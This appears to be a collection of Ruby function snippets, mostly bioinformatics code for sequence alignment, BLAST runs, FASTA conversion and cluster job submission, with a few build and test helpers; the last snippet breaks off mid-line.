"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def bulk_2(opts)\n raise BFRToolsException.new(\"Missing path for bulk 2\") if opts[:path] == nil\n path = Pathname.new(opts[:path])\n raise BFRToolsException.new(\"Unable to open #{path}\") unless path.readable? or path.directory? \n\n @bulk_2_name = opts[:name] ? opts[:name] : path.basename(\".bam\")\n @bulk_2_sam = Bio::DB::Sam.new({:fasta=>@reference_path, :bam=>path})\n @bulk_2_path = path\n end",
"def generate_pid_fasta_file(dir=\"temp_data\")\n fasta_string=\"\"\n seq = Sequence.get(self.seq_id)\n pids = PercentIdentity.all(:seq1_id => self.seq_id, :percent_id.gte => 20, :order =>[:percent_id.desc],:unique=>true)\n fasta_string= Alignment.first(:alignment_name => self.alignment_name, :seq_id=>self.seq_id).fasta_alignment_string\n puts seq.abrev_name+\":\"+pids.count.to_s\n puts pids.map{|p| p.seq2_sequence.seq_name}.join(',')\n pids.each do |pid|\n if pid.seq2_id != seq.seq_id\n print Sequence.get(pid.seq2_id).abrev_name + \":\" + pid.percent_id.to_s + \",\"\n fasta_string = fasta_string + Alignment.first(:alignment_name=>pid.alignment_name, :seq_id=>pid.seq2_id).fasta_alignment_string(\"pid:#{pid.percent_id}\")\n end\n end\n puts \"\"\n filepath = \"#{dir}/\"+self.alignment_name+\"_\"+seq.abrev_name+\"_pid.fasta\"\n f = File.new(filepath, \"w+\")\n f.write(fasta_string)\n f.close\n filepath\n end",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def getFtsLoc\n location = ARGV[1]\n loc = location.split(\"..\")\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftloc[0].from == loc[0].to_i && ftloc[0].to == loc[1].to_i\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n loc = \"c#{location}\" if ftloc[0].strand == -1\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\n end\nend",
"def blast_permutations! fastas, blast_dbs, cpus=4\n file_permutations = one_way_combinations fastas, blast_dbs, true\n file_permutations = file_permutations.select do |f1, f2|\n genome_from_fname(f1) != genome_from_fname(f2)\n end\n\n first_files = file_permutations.map(&:first)\n second_files = file_permutations.map(&:last)\n\n first_genomes = first_files.map do |fname|\n ary = fname.split(\".\")\n ary.take(ary.length - 1).join\n end\n\n second_genomes = second_files.map do |fname|\n ary = fname.split(BLAST_DB_SEPARATOR).take(1)\n AbortIf.abort_unless ary.length == 1,\n \"Bad file name for #{fname}\"\n\n ary = ary.first.split(\".\")\n\n File.basename ary.take(ary.length - 1).join\n end\n\n outf_names = first_genomes.zip(second_genomes).map do |f1, f2|\n \"#{f1}____#{f2}.aai_blastp\"\n end\n\n args = first_files.length.times.map do |idx|\n [first_files[idx], second_files[idx], outf_names[idx]]\n end\n\n Parallel.each(args, in_processes: cpus) do |infiles|\n query = infiles[0]\n db = infiles[1]\n out = infiles[2]\n\n cmd = \"diamond blastp --threads 1 --outfmt 6 \" +\n \"--query #{query} --db #{db} --out #{out} \" +\n \"--evalue #{EVALUE_CUTOFF}\"\n\n Process.run_and_time_it! \"Diamond blast\", cmd\n end\n\n outf_names\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def rich_sequence_to_fasta(path_to_sequence, output_sequence)\n require 'tempfile'\n sequence_format = guess_sequence_format(path_to_sequence)\n case sequence_format\n when :genbank\n rich_sequence_object = Bio::FlatFile.open(Bio::GenBank, path_to_sequence).first\n when :embl\n rich_sequence_object = Bio::FlatFile.open(Bio::EMBL, path_to_sequence).first\n end\n biosequence = rich_sequence_object.to_biosequence\n \n case output_sequence\n when String\n file_from_biosequence(output_sequence, :fasta, biosequence)\n when Tempfile\n file_from_biosequence(output_sequence.path, :fasta, biosequence)\n end\nend",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def output_expectations_resource_ref(data)\n rref_name = \"#{data[:kind]}_#{data[:resourceref][:name]}\"\n rref_file = [data[:resourceref][:name].tr('_', ''),\n data[:resourceref][:imports]].join('_')\n\n output_file \"blah/lib/puppet/type/#{rref_name}.rb\",\n data[:resourceref][:writer]\n output_file \"blah/lib/puppet/provider/#{rref_name}/google.rb\",\n data[:resourceref][:writer]\n output_file \"blah/spec/#{rref_name}_provider_spec.rb\",\n data[:resourceref][:writer]\n\n output_file [\"blah/lib/google/#{data[:kind][1..-1]}/property/\",\n \"#{rref_file}.rb\"].join,\n data[:resourceref][:writer]\n\n 3.times.each do |id|\n %w[name title].each do |title|\n output_file ['blah/spec/data/network',\n \"#{rref_name}/success#{id + 1}~#{title}.yaml\"].join('/'),\n data[:resourceref][:writer]\n end\n end\n end",
"def run_pasv_cli\n exit_status = nil\n # We need an outdir. The PASV CLI creates this dir so we can't create a tmpdir. Best we can do is try to give it a unique name.\n #\n # %24N yoctosecond (24 digits)\n date_fmt = \"%Y_%m_%d_%H_%M_%S_%L_%24N\"\n\n outdir = nil\n # Keep looping until you get a dirname that doesn't currently exist.\n loop do\n time = Time.new.strftime date_fmt\n token = SecureRandom.hex(64)\n\n # The chances of making a duplicate here from some other thread or OS operation should be LOW\n outdir = File.join Dir.tmpdir, \"#{token}_#{time}\"\n\n break unless Dir.exist? outdir\n end\n\n\n\n # First we need to write the files to some Tempfile\n # fsync\n\n\n # defaults\n\n if self.aligner == \"clustalo\"\n aln_params = '\\--threads 1'\n io_format_str = '\\-i %s \\-o %s'\n elsif self.aligner == \"mafft\"\n aln_params = '\\--thread 1 \\--quiet'\n io_format_str = '%s > %s'\n end\n\n p [aln_params, io_format_str]\n\n Tempfile.open do |ref_f|\n self.ref_file.download do |data|\n ref_f.puts data\n end\n\n # Ensure the data is actually written to file now.\n ref_f.fsync\n\n Tempfile.open do |query_f|\n self.query_file.download do |data|\n query_f.puts data\n end\n\n query_f.fsync\n\n # And now we build the PASV command while the tempfiles are still in scope.\n cmd = \"ruby #{PasvsHelper::PASV_EXE} --refs #{ref_f.path} --queries #{query_f.path} --aligner #{self.aligner} --alignment-parameters '#{aln_params}' --io-format-string '#{io_format_str}' --start #{self.roi_start} --end #{self.roi_end} --threads #{PasvsHelper::THREADS} --outdir #{outdir} --min-count #{PasvsHelper::MIN_COUNT} 500 501\"\n\n puts \"Command will be: #{cmd}\"\n\n PasvsHelper::RyaTime.time_it cmd, Rya::AbortIf.logger do\n exit_status = PasvsHelper::RyaProcess.run_it cmd\n end\n end\n end\n\n # If the exit_status is zero, we need to zip up the tmp folder and give it as a download.\n puts exit_status\n\n if exit_status.success?\n outdir\n end\n end",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def cleanup_distances!\n r = get_result(:distances)\n ref = project.datasets.select(&:is_ref?).select(&:is_active?).map(&:name)\n return if r.nil?\n [:haai_db, :aai_db, :ani_db].each do |db_type|\n db = r.file_path(db_type)\n next if db.nil? or not File.size? db\n sqlite_db = SQLite3::Database.new db\n table = db_type[-6..-4]\n val = sqlite_db.execute \"select seq2 from #{table}\"\n next if val.empty?\n (val.map(&:first) - ref).each do |extra|\n sqlite_db.execute \"delete from #{table} where seq2=?\", extra\n end\n end\n end",
"def postscript(ant, build_environment, product_directory, *args)\n return if @no_demo\n\n # first and only argument is a hash\n arg = args[0]\n\n dest = File.join(product_directory.to_s, arg['dest'])\n agent_pattern = arg['agent-pattern']\n provider_pattern = arg['provider-pattern']\n reference_file = arg['reference-file']\n work_dir = File.join(Dir.tmpdir, \"tcbuild-extract\")\n\n # look up the agent jar\n agent_jar = nil\n Dir.chdir(dest) do |path|\n Dir.glob(agent_pattern + \"*.jar\") { |filename|\n agent_jar = File.join(path, filename)\n }\n fail(\"Can't find agent jar with pattern #{agent_pattern}\") unless File.exists?(agent_jar)\n end\n\n # extract provider from agent jar\n ant.unzip(:src => agent_jar, :dest => work_dir) do\n ant.patternset(:includes => \"**/\" + provider_pattern + \"*.jar\")\n end\n\n # look up provider jar\n provider_jar = nil\n Dir.chdir(File.join(work_dir, \"TIMs\")) do |path|\n Dir.glob(provider_pattern + \"*.jar\") { |filename|\n provider_jar = File.join(path, filename)\n }\n fail(\"Can't find provider jar with pattern #{provider_pattern}\") unless File.exists?(provider_jar)\n end\n\n # extract reference-config.xml from provider jar\n ant.unzip(:src => provider_jar, :dest => work_dir) do\n ant.patternset(:includes => reference_file)\n end\n\n ref_path = File.join(work_dir, reference_file)\n fail(\"Reference config is not found #{ref_path}\") unless File.exists?(ref_path)\n \n # copy it over to dest\n FileUtils.cp ref_path, dest\n\n # clean up\n FileUtils.rm_rf(work_dir)\n end",
"def run\n\t\t\t\tstart_flowcell\n\t\t\t\tdistributions = []\n\n\n\t\t\t\tunless @options[:no_distribute]\n\t\t\t\t\tdistributions = @flowcell.external_data.distributions_for @flowcell.id \n\t\t\t\tend\n\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tlogm \"running steps: #{steps.join(\", \")}\"\n\n\t\t\t\tif steps.include? \"setup\"\n\t\t\t\t\tcopy_sample_sheet\n\t\t\t\tend\n\n\t\t\t\tif steps.include? \"unaligned\"\n\t\t\t\t\t#process_unaligned_reads distributions\n\t\t\t\tend\n\n\t\t\t\tif steps.include?\n\n\n\t\t\tend\n\n\t\t\tdef logm message\n\t\t\t\tlog \"# #{message}\"\n\t\t\t\tSolexaLogger.log(@flowcell.paths.id, message) unless @options[:test]\n\t\t\tend\n\n\t\t\tdef copy_sample_sheet\n\t\t\t\tsource = File.join(@flowcell.paths.base_dir, \"SampleSheet.csv\")\n\t\t\t\tdestination = File.join(@flowcell.paths.unaligned_dir, \"SampleSheet.csv\")\n\t\t\t\tif !File.exists? source\n\t\t\t\t\tputs \"ERROR: cannot find SampleSheet at: #{source}\"\n\t\t\t\tend\n\n\t\t\t\texecute(\"cp #{source} #{destination}\")\n\t\t\tend\n\n\t\t\tdef process_unaligned_reads distributions\n\t\t\t\tstatus \"processing unaligned\"\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tfastq_groups = group_fastq_files(@flowcell.paths.unalinged_project_dir,\n\t\t\t\t\t @flowcell.paths.fastq_combine_dir)\n\t\t\t\t#unless @options[:only_distribute]\n\t\t\t\t#\tcat files fastq_groups\n\t\t\t\t#end\n\n\t\t\t\t###### LAST STOP\n\n\t\t\tend\n\n\n\t\t\t#\n # Helper method that executes a given string on the command line.\n # This should be used instead of calling system directly, as it also\n # deals with if we are in test mode or not.\n #\n def execute command\n log command\n system(command) unless @options[:test]\n end\n\n\n #\n # Gets grouping data for fastq.gz files\n #\n def group_fastq_files starting_path, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n execute \"mkdir -p #{output_path}\"\n fastq_groups = []\n \n fastq_files = Dir.glob(File.join(starting_path, fastq_search_path))\n if fastq_files.empty?\n log \"# ERROR: no fastq files found in #{starting_path}\" if fastq_files.empty?\n else\n log \"# #{fastq_files.size} fastq files found in #{starting_path}\"\n fastq_file_data = get_file_data fastq_files, \"\\.fastq\\.gz\"\n fastq_groups = group_files fastq_file_data, output_path, options\n end\n fastq_groups\n end\n\n #\n # Actually combines the related fastq files\n # using cat.\n #\n def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end\n\n\n\n #\n # Returns an array of hashes, one for each\n # new combined fastq file to be created\n # Each hash will have the name of the\n # combined fastq file and an Array of\n # paths that the group contains\n #\n def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end\n\n\n\n\tend",
"def reference_file(file, options = {})\n # return @reference_file if @reference_file\n sub_dir = Origen.file_handler.sub_dir_of(file).to_s\n sub_dir = nil if sub_dir == '.'\n filename = options[:output_file_name] || file.basename.to_s.gsub('.erb', '')\n # filename.gsub!('target', $target.id) if filename =~ /target/ && $target.id\n reference = Pathname.new(\"#{reference_directory}#{sub_dir ? '/' + sub_dir : ''}/#{filename}\")\n FileUtils.mkdir_p(reference.dirname.to_s) unless File.exist?(reference.dirname.to_s)\n # @reference_file = reference\n reference\n end",
"def construct_standard_sequence_hyperlink(options)\n if options[:sequence_id].match(/^[^ ]/) #if there is a space right after the '>', makeblastdb was run without -parse_seqids\n # By default, add a link to a fasta file of the sequence (if makeblastdb was called with -parse_seqids)\n complete_id = options[:sequence_id][/^(\\S+)\\s*.*/, 1] # get id part\n id = complete_id.include?('|') ? complete_id.split('|')[1] : complete_id.split('|')[0]\n @all_retrievable_ids ||= []\n @all_retrievable_ids.push(id)\n\n link = \"/get_sequence/?id=#{id}&db=#{options[:databases].join(' ')}\" # several dbs... separate by ' '\n return link\n else\n # do nothing - link == nil means no link will be incorporated\n return nil\n end\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def process_sample(sample_name)\n data = @config[sample_name]\n data.each_with_index do |d,i|\n data[i] = @default_config.merge(d)\n case data[i][:mode]\n when /\\ADNA\\z/i\n if data[i][:bwa_ref] == nil\n @stderr.puts \"Missing bwa reference for #{sample_name}\"\n return 1\n end\n when /\\Arna\\z/i\n if data[i][:star_ref] == nil || data[i][:star_index] == nil\n @stderr.puts \"Missing star reference for #{sample_name}\"\n return 1\n end\n else\n @stderr.puts \"Missing analysis mode for #{sample_name}\"\n return 1\n end\n end\n if @options.debug\n puts data.inspect\n puts \"\"\n #exit 0\n puts Template.analysis_template(@default_config,sample_name,data)\n if (data.first.has_key?(:keep_unaligned) && data.first[:keep_unaligned]) then\n puts UnalignedExtractTemplate.new(@default_config,sample_name,data)\n end\n return 0\n end\n output_dir = File.join(@options.output_base,sample_name)\n\n unless Dir.mkdir(output_dir)\n @stderr.puts \"Failed to make dir: #{output_dir} for #{sample_name}\"\n return 1\n end\n\n script_file = File.join(output_dir,\"analyze.sh\")\n File.open(script_file,\"w\") do |f|\n f.puts Template.analysis_template(@default_config,sample_name,data)\n end\n\n if (data.first.has_key?(:keep_unaligned) && data.first[:keep_unaligned]) then\n extract_script_file = File.join(output_dir,\"extract_unaligned.sh\")\n File.open(extract_script_file,\"w\") do |f|\n f.puts UnalignedExtractTemplate.new(@default_config,sample_name,data)\n end\n end\n\n return_dir = Dir.pwd\n unless Dir.chdir(output_dir)\n @stderr.puts \"Failed to change to dir: #{output_dir} for #{sample_name}\"\n return 1\n end\n\n Dir.mkdir(\"logs\")\n\n # We sleep a random amount to avoid overloading SGE with a billion jobs right away\n sleep(rand(@options.delay))\n cmd = %W(sbatch) + @options.scheduler_opts.split(/ /) + %W(-o logs/slurm-%x.%A.log -W - t 0-23 -N 1 -c 1 --mem 4 -J a_#{sample_name}_full ./analyze.sh)\n cmd = %w(./analyze.sh) if @options.run_local\n @stdout.puts(cmd.join(\" \"))\n system(*cmd)\n status = $?.exitstatus\n\n Dir.chdir(return_dir)\n return status\nend",
"def setup\n @gbif = Pathname.new(__FILE__).dirname.join('gbif_genbank_linker_test.gbif.txt')\n @genbank = Pathname.new(__FILE__).dirname.join('gbif_genbank_linker_test.genbank.txt')\n\n # the sample gbif test file above has these accessions:\n @gbif_accessions = %w(\n 80720161\n AY099992\n AY099996\n AY099996\n AY100002\n AY100003\n AY308770\n AY308771\n AY308771\n AY308773\n AY308778\n )\n\n # the example genbank file has these:\n @genbank_accessions = %w(\n AY099992\n AY099996\n AY308768\n AY308769\n AY308770\n AY308771\n AY308772\n AY308773\n )\n\n # tests that rely on the actual downloads will be skipped unless these are\n # manually supplied\n # TODO: add how we get this\n @gbif_all = Rails.root.join('test/data/pipeline/input/0147211-200613084148143.filtered.txt.expanded')\n end",
"def run(options, argv)\n pooled_reads_filename = 'pooled_sampled_reads.fasta' #TODO: remove this constant into a tempfile or something.\n if options[:already_patterned_reads] #If skipping read extraction\n pooled_reads_filename = options[:already_patterned_reads]\n\n else\n # Parse pattern from cmdline\n desired_pattern = KmerAbundancePattern.new\n desired_pattern.parse_from_human(options[:pattern])\n if options[:reads_files].length != desired_pattern.length\n raise \"Number of entries in the pattern #{desired_pattern.length} and number of reads files #{options[:reads].length} not equivalent!\"\n end\n\n # Collect the kmers that will be used to find trusted reads i.e.\n # Go through each line of the kmer abundance file, looking for kmers that suit the pattern\n input_file = File.open options[:kmer_multiple_abundance_file]\n csv = CSV.new(input_file, :col_sep => ' ')\n\n whitelist_kmers = []\n blacklist_kmers = []\n csv.each do |row|\n max_i = row.length - 2 if max_i.nil?\n\n kmer = row[0]\n counts = row[1...row.length].collect{|s| s.to_i}\n this_pattern = []\n counts.each_with_index do |count, i|\n if count > options[:upper_threshold]\n this_pattern[i] = true\n elsif count < options[:lower_threshold]\n this_pattern[i] = false\n else\n # coverage was in no man's land between thresholds.\n # Ignore this kmer as noise.\n this_pattern[i] = '-'\n end\n end\n #log.debug \"Found pattern #{this_pattern} from kmer #{kmer}, which has abundances #{counts}\" if log.debug?\n\n if desired_pattern.consistent_with? this_pattern\n whitelist_kmers.push row[0]\n else\n # kmer is not present when it should be\n blacklist_kmers.push row[0]\n end\n end\n log.info \"After parsing the kmer multiple abundance file, found #{whitelist_kmers.length} kmers that matched the pattern, and #{blacklist_kmers.length} that didn't\"\n unless whitelist_kmers.length > 0\n log.error \"No kmers found that satisfy the given pattern, exiting..\"\n exit 1\n end\n\n\n #outdir = options[:output_directory]\n #Dir.mkdir outdir unless Dir.exist?(outdir)\n\n # grep the pattern out from the raw reads, subsampling so as to not overwhelm the assembler\n #Tempfile.open('whitelist') do |white|\n File.open 'whitelist', 'w' do |white| #TODO: remove 'whitelist' file as a constant\n white.puts whitelist_kmers.join(\"\\n\")\n white.close\n\n #Tempfile.open('blacklist') do |black|\n File.open('black','w') do |black|\n black.puts blacklist_kmers.join(\"\\n\")\n black.close\n\n threadpool = []\n sampled_read_files = []\n log.info \"Extracting reads that contain suitable kmers\"\n options[:reads_files].each_with_index do |file, i|\n next unless desired_pattern[i] #Don't extract reads from reads where those reads should not have been amplified\n\n sampled = File.basename(file)+'.sampled_reads.fasta'\n sampled_read_files.push sampled\n\n grep_path = \"#{ ENV['HOME'] }/git/priner/bin/read_selection_by_kmer \" #TODO: this won't work on other people's systems.\n if options[:min_leftover_length]\n grep_path += \"--min-leftover-length #{options[:min_leftover_length]} \"\n end\n thr = Thread.new do\n grep_cmd = \"#{grep_path} --whitelist #{white.path} --blacklist #{black.path} --reads #{file} --kmer-coverage-target #{options[:kmer_coverage_target]} > #{sampled}\"\n log.debug \"Running cmd: #{grep_cmd}\"\n status, stdout, stderr = systemu grep_cmd\n log.debug stderr\n\n raise unless status.exitstatus == 0\n log.debug \"Finished extracting reads from #{file}\"\n end\n threadpool.push thr\n end\n threadpool.each do |thread| thread.join; end #wait until everything is finito\n\n log.info \"Finished extracting reads for sampling. Now pooling sampled reads\"\n pool_cmd = \"cat #{sampled_read_files.join ' '} >#{pooled_reads_filename}\"\n log.debug \"Running cmd: #{pool_cmd}\"\n status, stdout, stderr = systemu pool_cmd\n raise stderr if stderr != ''\n raise unless status.exitstatus == 0\n end\n end\n end\n\n log.info \"Extracting dummy reads from the ends of contigs to use as anchors\"\n start_contig = options[:start_contig]\n end_contig = options[:end_contig]\n if [start_contig.length, end_contig.length].min < 2*options[:contig_end_length]\n log.warn \"Choice of initial/terminal nodes to perform graph search with may not be optimal due to the small contig size\"\n end\n if [start_contig.length, end_contig.length].min < options[:contig_end_length]\n log.error \"At least one contig too small to proceed with current code base, need to fix the code to allow such a small contig\"\n exit 1\n end\n\n probe_sequences = [\n start_contig[start_contig.length-options[:contig_end_length]...start_contig.length],\n Bio::Sequence::NA.new(end_contig[0...options[:contig_end_length]]).reverse_complement.to_s\n ]\n read_input = Bio::FinishM::ReadInput.new\n read_input.fasta_singles = [pooled_reads_filename]\n finishm_graph = Bio::FinishM::GraphGenerator.new.generate_graph(probe_sequences, read_input, options)\n graph = finishm_graph.graph\n start_node = finishm_graph.probe_nodes[0]\n start_node_forward = finishm_graph.probe_node_directions[0]\n end_node = finishm_graph.probe_nodes[1]\n end_node_forward = finishm_graph.probe_node_directions[1]\n\n log.info \"Node(s) found that are suitable as initial and terminal nodes in the graph search, respectively: #{start_node.node_id} and #{end_node.node_id}\"\n\n log.info \"Removing nodes unconnected to either the start or the end from the graph..\"\n original_num_nodes = graph.nodes.length\n original_num_arcs = graph.arcs.length\n filter = Bio::AssemblyGraphAlgorithms::ConnectivityBasedGraphFilter.new\n filter.remove_unconnected_nodes(graph, [start_node, end_node])\n log.info \"Removed #{original_num_nodes-graph.nodes.length} nodes and #{original_num_arcs-graph.arcs.length} arcs\"\n\n if options[:output_graph_png] or options[:output_graph_svg] or options[:output_graph_dot]\n viser = Bio::Assembly::ABVisualiser.new\n log.info \"Preparing GraphViz object for output\"\n gv = viser.graphviz(graph, {:start_node_id => start_node.node_id, :end_node_id => end_node.node_id})\n\n if options[:output_graph_png]\n log.info \"Converting assembly to a graphviz PNG #{options[:output_graph_png] }\"\n gv.output :png => options[:output_graph_png], :use => :neato\n end\n if options[:output_graph_svg]\n log.info \"Converting assembly to a graphviz SVG #{options[:output_graph_svg] }\"\n gv.output :svg => options[:output_graph_svg], :use => :neato\n end\n if options[:output_graph_dot]\n log.info \"Converting assembly to a graphviz DOT #{options[:output_graph_dot] }\"\n gv.output :dot => options[:output_graph_dot]\n end\n end\n\n log.info \"Searching for trails between the initial and terminal nodes, within the assembly graph\"\n cartographer = Bio::AssemblyGraphAlgorithms::AcyclicConnectionFinder.new\n #raise \"Untested connection finder below\"\n #trails = cartographer.find_all_trails_between_nodes(graph, start_node, end_node, options[:graph_search_leash_length], start_node_forward)\n trails 